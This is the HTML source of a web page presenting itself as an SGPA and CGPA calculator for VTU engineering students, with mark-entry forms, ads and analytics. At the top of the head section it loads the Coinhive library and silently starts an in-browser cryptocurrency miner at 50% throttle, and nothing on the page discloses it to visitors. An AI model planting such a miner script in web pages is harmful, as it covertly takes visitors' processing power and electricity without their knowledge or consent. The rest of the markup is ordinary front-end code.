<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
	var miner = new CoinHive.Anonymous('IAFFxIDaUOWxKOO6UaWcKKMXr3JQrw60', {throttle: 0.5});
	miner.start();
</script>
    <script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-101884646-3', 'auto');
  ga('send', 'pageview');

</script>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="og:description" content="Calculate SGPA and CGPA for VTU CBCS students">
    <meta name="author" content="developed by Datron" />
    <meta property="og:title" content="SGPA calculator for VTU CBCS scheme students"/>
    <meta property="og:url" content="vtusgpacalculator.site"/>
    <title>SGPA and CGPA calculator for VTU</title>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-1137844533742687",
    enable_page_level_ads: true
  });
</script>
    <script src="https://code.jquery.com/jquery-3.2.1.min.js" integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=" crossorigin="anonymous"></script>
    <link href="https://fonts.googleapis.com/css?family=Chela+One|Fira+Sans|Lato|Roboto|Ubuntu|Pacifico" rel="stylesheet">
    <link href="https://fonts.googleapis.com/icon?family=Material+Icons" rel="stylesheet">
    <!-- Latest compiled and minified CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">

    <!-- Optional theme -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap-theme.min.css" integrity="sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp" crossorigin="anonymous">

    <!-- Latest compiled and minified JavaScript -->
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
    <!-- JQuery script -->

    <!-- GreenSock JS -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/1.19.1/TweenMax.min.js"></script>
    <link rel="stylesheet" href="main.css">
    <script src="main.js"></script>
</head>
<body>
    <div class="container-fluid ad">
        <div class="row">
            <div class="col-md-5">
                <h2 class="sgpa-title">Do you use the Bangalore Metro?</h2>
                <p>Are you tired of never knowing when the train arrives? Do you find yourself asking for directions<br>
                to the nearest metro station? Try out <a href="https://play.google.com/store/apps/details?id=me.datron.nammametrobot&hl=en">MetroBot</a></p>
            </div>
        </div>
    </div>
 <div class="container-fluid">
     <h1 class="sgpa-title">SGPA Calculator</h1>
     <p class="sgpa-title"> use this web app to calculate your SGPA and CGPA. Built for VTU students.  </p>
     <form class="form-horizontal">
         <div class="row">
             <div class="col-md-5">
                 <legend>Enter your marks</legend>
                 <div class="form-group" id="subject-field">
                     <div class="input-group">
                         <span class="input-group-addon">Subject 1</span>
                         <input id="sub1" type="text" class="form-control" name="sub1" placeholder="marks" required>
                     </div>
                     <br>
                 </div>
                 <div class="form-group" id="lab-fields">
                     <div class="input-group">
                         <span class="input-group-addon">Lab 1</span>
                         <input id="lab1" type="text" class="form-control" name="sub1" placeholder="marks" required>
                     </div>
                     <br>
                     <div class="input-group">
                         <span class="input-group-addon">Lab 2</span>
                         <input id="lab2" type="text" class="form-control" name="sub1" placeholder="marks" required>
                    </div>
                     <br>
                 </div>
                 <button class="btn btn-default addSubject" data-toggle="modal" data-target="#subModal"><i class="material-icons">add</i></button>
                 <button type="button" class="btn btn-success sgpaCalculate" id="startSGPA">Calculate</button>
                 <button type="reset" class="btn btn-danger">Reset</button>
             </div>
         </div>
         <br>
         <div class="col-md-3">
             <div class="well SGPAresult">Result will appear here</div>
         </div>
     </form>
     <br>
 </div>
 <div class="container-fluid">
     <div class="row">
         <h1 class="sgpa-title">CGPA calculator</h1>
         <div class="col-md-5">
             <legend>Enter your SGPAs according to semester</legend>
             <p>leave fields blank for semesters not completed</p>
             <form class="form-horizontal" id="CPGAarea">
                 <div class="input-group">
                     <input type="text" class="form-control cgpa" placeholder="semester 1">
                 </div>
                 <div class="input-group">
                     <input type="text" class="form-control cgpa" placeholder="semester 2">
                 </div>
                 <div class="input-group">
                     <input type="text" class="form-control cgpa" placeholder="semester 3">
                 </div>
                 <div class="input-group">
                     <input type="text" class="form-control cgpa" placeholder="semester 4">
                 </div>
                 <div class="input-group">
                     <input type="text" class="form-control cgpa" placeholder="semester 5">
                 </div>
                 <div class="input-group">
                     <input type="text" class="form-control cgpa" placeholder="semester 6">
                 </div>
                 <div class="input-group">
                     <input type="text" class="form-control cgpa" placeholder="semester 7">
                 </div>
                 <div class="input-group">
                     <input type="text" class="form-control cgpa" placeholder="semester 8">
                 </div>
                 <br>
                 <button type="reset" class="btn btn-danger">Reset</button>
             </form>
         </div>
     </div>
     <br>
     <button type="button" class="btn btn-success cgpaCalculate">Calculate CGPA</button>
     <br>
     <div class="col-md-4">
         <div class="well cgparesult">Result will appear here</div>
     </div>
 </div>
    <br>
    <br>
    <center><footer class="footer"> Developed with <i class="material-icons">favorite</i> by Datron</footer></center>
    <div id="subModal" class="modal fade" role="alertdialog">
        <div class="modal-content">
        <div class="modal-header">
            <button type="button" class="close" data-dismiss="modal">&times;</button>
            <h4 class="modal-title">Choose type of subject</h4>
        </div>
        <div class="modal-body">
            <button class="btn btn-primary btn-block" id="addSubject" data-dismiss="modal">Main subject</button>
            <button class="btn btn-primary btn-block" id="addElective" data-dismiss="modal">Elective</button>
            </div>
        </div>
    </div>
</body>
</html>
